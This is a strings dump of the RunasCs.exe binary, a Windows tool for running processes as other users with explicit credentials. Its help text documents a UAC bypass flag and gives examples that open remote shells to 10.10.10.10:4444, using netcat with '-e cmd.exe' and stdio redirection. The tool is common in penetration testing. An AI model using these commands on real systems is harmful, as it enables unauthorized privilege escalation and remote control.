!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
__StaticArrayInitTypeSize=20
LOGON32_PROVIDER_WINNT50
dwSubAuthority0
List`1
dwSubAuthority1
advapi32
user32
ToUInt32
ReadInt32
ToInt32
TOKEN_PRIVILEGES_2
KeyValuePair`2
Dictionary`2
cbReserved2
lpReserved2
dwSubAuthority2
dwSubAuthority3
ToInt64
dwSubAuthority4
dwSubAuthority5
dwSubAuthority6
dwSubAuthority7
AA4DD09C100412D19FF0268A42A3AF0F50088041A833E769FF3DEBF20EF94F48
<Module>
<PrivateImplementationDetails>
WRITE_DAC
GENERIC_READ
TOKEN_READ
STANDARD_RIGHTS_READ
CREATE_SUSPENDED
SE_PRIVILEGE_ENABLED
SE_GROUP_ENABLED
SE_GROUP_INTEGRITY_ENABLED
STANDARD_RIGHTS_REQUIRED
ERROR_LOGON_TYPE_NOT_GRANTED
MAXIMUM_ALLOWED
TOKEN_ADJUST_SESSIONID
SECURITY_MANDATORY_UNTRUSTED_RID
SECURITY_MANDATORY_HIGH_RID
SECURITY_MANDATORY_SYSTEM_RID
SECURITY_MANDATORY_MEDIUM_RID
SECURITY_MANDATORY_PROTECTED_PROCESS_RID
SECURITY_MANDATORY_LOW_RID
SE_GROUP_LOGON_ID
WINSTA_ACCESSCLIPBOARD
DESKTOP_JOURNALRECORD
MAXDWORD
ACCESS_ALLOWED_ACE
NO_PROPAGATE_INHERIT_ACE
CONTAINER_INHERIT_ACE
OBJECT_INHERIT_ACE
INHERIT_ONLY_ACE
SE_SERVICE
LOGON32_LOGON_SERVICE
SE_GROUP_RESOURCE
TOKEN_QUERY_SOURCE
LOGON_WITH_PROFILE
UOI_NAME
BUFFER_SIZE_PIPE
ACCESS_ALLOWED_ACE_TYPE
TOKEN_ELEVATION_TYPE
SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE
SE_LMSHARE
SID_NAME_USE
TOKEN_DUPLICATE
TOKEN_IMPERSONATE
WINSTA_ENUMERATE
DESKTOP_ENUMERATE
DELETE
GENERIC_WRITE
STANDARD_RIGHTS_WRITE
GENERIC_EXECUTE
STANDARD_RIGHTS_EXECUTE
LOGON32_LOGON_INTERACTIVE
SYNCHRONIZE
LOGON32_LOGON_BATCH
DESKTOP_JOURNALPLAYBACK
LOGON32_LOGON_NETWORK
ACCESS_MASK
WindowStationDACL
AddAllowedAceToDACL
TOKEN_MANDATORY_LABEL
SECURITY_IMPERSONATION_LEVEL
ImpersonateLoggedOnUserWithProperIL
WINSTA_ALL
GENERIC_ALL
DESKTOP_ALL
SPECIFIC_RIGHTS_ALL
STANDARD_RIGHTS_ALL
SE_DS_OBJECT_ALL
DESKTOP_HOOKCONTROL
READ_CONTROL
WINSTA_READSCREEN
SOCKADDR_IN
ACL_REVISION
SECURITY_DESCRIPTOR_REVISION
ACL_SIZE_INFORMATION
UNPROTECTED_DACL_SECURITY_INFORMATION
UNPROTECTED_SACL_SECURITY_INFORMATION
GROUP_SECURITY_INFORMATION
OWNER_SECURITY_INFORMATION
TOKEN_ELEVATION
PROFILEINFO
STARTUPINFO
System.IO
WINSTA_CREATEDESKTOP
DESKTOP_SWITCHDESKTOP
ACE_HEADER
ERROR_INSUFFICIENT_BUFFER
WRITE_OWNER
SE_GROUP_OWNER
SE_PRINTER
NO_ERROR
TOKEN_PRIVILEGES
TOKEN_ADJUST_PRIVILEGES
WINSTA_READATTRIBUTES
WINSTA_WRITEATTRIBUTES
SID_AND_ATTRIBUTES
LUID_AND_ATTRIBUTES
SECURITY_ATTRIBUTES
ERROR_INVALID_FLAGS
LOGON32_LOGON_NEW_CREDENTIALS
WINSTA_ACCESSGLOBALATOMS
WINSTA_ENUMDESKTOPS
TOKEN_ADJUST_GROUPS
ACL_INFORMATION_CLASS
TOKEN_INFORMATION_CLASS
GENERIC_ACCESS
DUPLICATE_SAME_ACCESS
TOKEN_ALL_ACCESS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
WINSTA_EXITWINDOWS
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
SE_FILE_OBJECT
SE_KERNEL_OBJECT
SE_DS_OBJECT
SE_WINDOW_OBJECT
LOGON32_PROVIDER_DEFAULT
TOKEN_ADJUST_DEFAULT
SE_GROUP_ENABLED_BY_DEFAULT
CREATE_UNICODE_ENVIRONMENT
LOGON32_LOGON_NETWORK_CLEARTEXT
DESKTOP_CREATEMENU
DESKTOP_CREATEWINDOW
CREATE_NO_WINDOW
RunasCreateProcessWithTokenW
RunasCreateProcessWithLogonW
RunasCreateProcessAsUserW
SE_REGISTRY_WOW64_32KEY
SE_REGISTRY_KEY
LOGON_NETCREDENTIALS_ONLY
SE_GROUP_USE_FOR_DENY_ONLY
TOKEN_ASSIGN_PRIMARY
TOKEN_QUERY
SE_GROUP_MANDATORY
SE_GROUP_INTEGRITY
MANDATORY_LABEL_AUTHORITY
SID_IDENTIFIER_AUTHORITY
ACCESS_SYSTEM_SECURITY
value__
hWinSta
lpszWinSta
WSAData
wsaData
hWinsta
mscorlib
bypassUac
System.Collections.Generic
threadId
get_SessionId
TokenSessionId
processId
nNumberOfBytesToRead
lpNumberOfBytesRead
hOutputRead
ResumeThread
hTokenPreviousImpersonatingThread
hThread
thread
lpnLengthNeeded
TokenVirtualizationEnabled
Disabled
lpOverlapped
logonTypeNotFiltered
HelpRequired
IsUserProfileCreated
TokenIsElevated
TokenIsRestricted
bDaclDefaulted
daclDefaulted
pSIRequested
wVersionRequested
Untrusted
lpReserved
TokenVirtualizationAllowed
TokenIsSandboxed
pSourceSid
FreeSid
AllocateAndInitializeSid
GetLengthSid
TokenLogonSid
pDestinationSid
TokenAppContainerSid
GetUserSid
userSid
CopySid
SidTypeInvalid
lpLuid
pszPassword
password
AddAce
AddAccessAllowedAce
GetAce
TokenPrivateNameSpace
TokenSessionReference
TokenSource
lpMode
AclBytesFree
get_Message
message
EnablePrivilege
privilege
GetEnvironmentVariable
IDisposable
get_Handle
RuntimeFieldHandle
hSourceHandle
RuntimeTypeHandle
CloseHandle
DuplicateHandle
GetTypeFromHandle
DuplicateTokenHandle
ExistingTokenHandle
pHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
tokenhandle
ReadFile
hProfile
LoadUserProfile
UnloadUserProfile
Console
lpTitle
LookupPrivilegeName
cchName
lpSystemName
cchReferencedDomainName
domainName
lpApplicationName
applicationName
win32FunctionName
lpName
lpUserName
pszUserName
userName
lpServerName
lpAccountName
LookupAccountName
lpsystemname
lpname
username
lpCommandLine
commandLine
WriteLine
ParseCommonProcessesInCommandline
commandline
hReadPipe
hNamedPipe
CreatePipe
hWritePipe
ReadOutputFromPipe
AceType
ValueType
ProtocolType
protocolType
TokenType
ValidateLogonType
CheckAvailableUserLogonType
dwLogonType
logonType
TokenElevationType
ObjectType
SocketType
socketType
PtrToStructure
AclBytesInUse
Dispose
hTokenDuplicate
Impersonate
SetNamedPipeHandleState
PreivousState
Newstate
hErrorWrite
hOutputWrite
ValidateRemote
ConnectRemote
remote
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
attribute
ReadByte
get_Value
LookupPrivilegeValue
RunasCs.exe
dwXSize
dwYSize
AceSize
aceSize
dwSize
addrsize
SizeOf
RevertToSelf
iMaxUdpDg
Encoding
System.Runtime.Versioning
convertAttributeToString
GetWin32ErrorString
GetString
error_string
Substring
ComputeStringHash
lpProfilePath
processPath
lpDefaultPath
lpPolicyPath
get_Length
nDestinationSidLength
nAclLength
nAclInformationLength
TokenInformationLength
ReturnLength
nAceListLength
Returnlength
bufferlength
stationDaclObj
CreateEnvironmentBlock
GetUserEnvironmentBlock
DestroyEnvironmentBlock
AccessMask
AllocHGlobal
FreeHGlobal
Marshal
System.Security.Principal
InitializeAcl
GetSecurityDescriptorDacl
SetSecurityDescriptorDacl
TokenDefaultDacl
System.ComponentModel
TokenImpersonationLevel
TokenProcessTrustLevel
GetTokenIntegrityLevel
SetTokenIntegrityLevel
ws2_32.dll
advapi32.dll
Kernel32.dll
kernel32.dll
user32.dll
userenv.dll
get_Item
System
RevertToSelfCustom
Medium
IsFilteredUACToken
get_Token
SetThreadToken
TokenLinkedToken
phToken
AccessToken
OpenProcessToken
RunasCsMain
SidTypeDomain
pszDomain
domain
TokenOrigin
IsLimitedUserLogon
dwAceRevision
dwAclRevision
dwRevision
wHighVersion
wVersion
SecurityIdentification
forceProfileCreation
forceUserProfileCreation
SecurityDelegation
TokenBnoIsolation
AclSizeInformation
pAclInformation
GetAclInformation
GetTokenInformation
SetTokenInformation
AclRevisionInformation
TokenAccessInformation
lpProcessInformation
processInformation
GetUserObjectInformation
RunasRemoteImpersonation
remoteImpersonation
TokenImpersonation
SecurityImpersonation
CloseWindowStation
AddAclToActiveWindowStation
OpenWindowStation
AddAceToWindowStation
GetProcessWindowStation
SetProcessWindowStation
TokenElevation
System.Reflection
ValidateCreateProcessFunction
DefaultCreateProcessFunction
createProcessFunction
GetProcessFunction
function
Win32Exception
IndexOutOfRangeException
RunasCsException
ArgumentException
szDescription
SidTypeUnknown
lpProfileInfo
protocolInfo
lpStartupInfo
startupInfo
lpVendorInfo
processInfo
pvInfo
SetSecurityInfo
TokenIsAppSilo
sin_zero
CloseDesktop
hDesktop
OpenDesktop
AddAceToDesktop
lpDesktop
lpszDesktop
psidGroup
SidTypeGroup
SidTypeWellKnownGroup
TokenPrimaryGroup
WSAStartup
sin_addr
TokenAppContainerNumber
Header
dwLogonProvider
logonProvider
StringBuilder
lpBuffer
TokenIsLessPrivilegedAppContainer
TokenIsAppContainer
psidOwner
TokenOwner
SidTypeUser
ImpersonateLoggedOnUser
TokenUser
LogonUser
CreateProcessAsUser
TextWriter
BitConverter
SidTypeComputer
ToLower
returnWin32Error
GetLastWin32Error
hStdError
WSAGetLastError
GetEnumerator
.cctor
InitializeSecurityDescriptor
lpSecurityDescriptor
acePtr
aclPtr
StructureToPtr
ReadIntPtr
RunasCs
SidTypeAlias
TokenStatistics
System.Diagnostics
TokenRestrictedSids
milliseconds
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
TokenGroupsAndPrivileges
EnableAllPrivileges
GetTokenPrivileges
AdjustTokenPrivileges
TokenCapabilities
Startf_UseStdHandles
CleanupHandles
bInheritHandles
lpThreadAttributes
lpPipeAttributes
TokenRestrictedDeviceClaimAttributes
TokenDeviceClaimAttributes
TokenRestrictedUserClaimAttributes
TokenUserClaimAttributes
TokenSingletonAttributes
TokenGroupAttributes
lpProcessAttributes
TokenSecurityAttributes
GetAddressBytes
AceFlags
aceFlags
dwLogonFlags
logonFlags
dwCreationFlags
creationFlags
TokenChildProcessFlags
dwFlags
TokenHasRestrictions
dwOptions
TokenRestrictedDeviceGroups
TokenDeviceGroups
TokenGroups
get_Chars
dwXCountChars
dwYCountChars
RuntimeHelpers
RunasCsMainClass
dwAclInformationClass
TokenInformationClass
MaxTokenInfoClass
CreateProcessWithLogonWUacBypass
TokenUIAccess
dwDesiredAccess
CreateAnonymousPipeEveryoneAccess
ProtectedProcess
CreateProcess
RunasSetupStdHandlesForProcess
GetCurrentProcess
process
IPAddress
System.Net.Sockets
iMaxSockets
userProfileExists
SecurityAnonymous
szSystemStatus
disableprivs
Concat
Format
WaitForSingleObject
connect
getLogonTypeDict
getCreateProcessFunctionDict
System.Net
WSASocket
closesocket
op_Explicit
bInherit
fInherit
get_Default
lpEnvironment
environment
get_Current
GetCurrent
bDaclPresent
daclPresent
get_Count
AceCount
PrivilegeCount
lpMaxCollectionCount
GetSidSubAuthorityCount
nSubAuthorityCount
SidTypeDeletedAccount
HighPart
LowPart
SidStart
TokenSandBoxInert
Convert
hostshort
sin_port
pAceList
get_Out
lpCollectDataTimeout
ValidateProcessTimeout
processTimeout
timeout
hStdInput
hStdOutput
MoveNext
System.Text
WindowsImpersonationContext
wShowWindow
DuplicateTokenEx
dwStartingAceIndex
aceIndex
nIndex
subAuthorityIndex
InitializeArray
TokenAuditPolicy
TokenMandatoryPolicy
get_Key
ContainsKey
AddressFamily
addressFamily
sin_family
TokenPrimary
GetUserProfileDirectory
lpCurrentDirectory
currentDirectory
get_Capacity
EnsureCapacity
op_Equality
op_Inequality
integrity
GetSidSubAuthority
SidIdentifierAuthority
pIdentifierAuthority
GetUserObjectSecurity
SetUserObjectSecurity
WindowsIdentity
WrapNonExceptionThrows
RunasCs
Copyright
2022
$6d389dde-8d75-4b6b-904f-482650ae9560
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
[-] RunasCsException:
failed with error code:
CreateProcessAsUserW()
CreateProcessWithTokenW()
CreateProcessWithLogonW()
No output received from the process.
Specified port is invalid:
WSAStartup failed with error code: {0}
WSAConnect failed with error code: {0}
DuplicateTokenEx
[*] Warning: LoadUserProfile failed due to insufficient permissions
LogonUser
CreateProcessWithLogonWUacBypass: LogonUser
cmd.exe
COMSPEC
powershell
powershell.exe
WINDIR
\System32\WindowsPowerShell\v1.0\powershell.exe
Selected logon type '{0}' is not granted to the user '{1}'. Use available logon type '{2}'.
CreatePipe
DuplicateHandle stderr write pipe
DuplicateHandle stdout read pipe
SetNamedPipeHandleState
[*] Warning: Logon for user '{0}' is limited. Use the --logon-type value '{1}' to obtain a more privileged token
SystemRoot
\System32
CreateProcess
OpenProcessToken
SetThreadToken
CreateProcessWithLogonW logon type 9
CreateProcessWithLogonWUacBypass
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '
'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[*] Warning: The logon for user '{0}' is limited. Use the flag combination --bypass-uac and --logon-type '{1}' to obtain a more privileged token.
CreateProcessWithLogonW logon type 2
SeImpersonatePrivilege
CreateProcessWithTokenW
SeAssignPrimaryTokenPrivilege
CreateProcessAsUser
[*] Warning: User profile directory for user
does not exists. Use --force-profile if you want to force the creation.
The flag --bypass-uac is not compatible with {0} but only with --function '2' (CreateProcessWithLogonW)
[+] Running in session
with process function 'Remote Impersonation'
with process function
[+] Using Station\Desktop:
[+] Async process '
' with pid
created in background.
The username
has not been found.
LookupAccountName
CopySid
AddAce
GetUserObjectSecurity 1 size
GetUserObjectSecurity 2
GetSecurityDescriptorDacl
GetAclInformation
InitializeSecurityDescriptor
InitializeAcl
GetAce
SetSecurityDescriptorDacl
SetUserObjectSecurity
AddAccessAllowedAce
GetProcessWindowStation
GetUserObjectInformation
OpenWindowStation
SetProcessWindowStation hWinsta
Default
SetProcessWindowStation hWinstaSave
OpenDesktop
\Default
Disabled
Enabled Default
Enabled
Enabled|Enabled Default
GetTokenInformation
LookupPrivilegeName
GetTokenInformation TokenElevation
GetTokenInformation TokenElevationType
[!] Failed to set the token's Integrity Level:
AdjustTokenPrivileges on privilege
AdjustTokenPrivileges on privilege
succeeded
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSyncAgentPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeUndockPrivilege
SeUnsolicitedInputPrivilege
Interactive
Network
Service
Unlock
NetworkCleartext
NewCredentials
RemoteInteractive
CachedInteractive
CreateProcessAsUserW
CreateProcessWithLogonW
--help
Invalid process_timeout value:
Invalid remote value:
[-] Expected format: 'host:port'
Invalid logon_type value:
[-] Allowed values are:
[-] {0}
Invalid createProcess function:
--domain
--timeout
--logon-type
--function
--remote
--force-profile
--bypass-uac
--remote-impersonation
[-] Invalid arguments. Use --help for additional help.
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
RunasCs v1.5 - @splinter_code
Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]
Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.
Positional arguments:
username username of the user
password password of the user
cmd commandline for the process
Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
RunasCs determines an appropriate CreateProcess
function automatically according to your privileges.
0 - CreateProcessAsUserW
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.
Examples:
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation
[-] RunasCsException:
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
RunasCs
FileVersion
1.0.0.0
InternalName
RunasCs.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
RunasCs.exe
ProductName
RunasCs
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0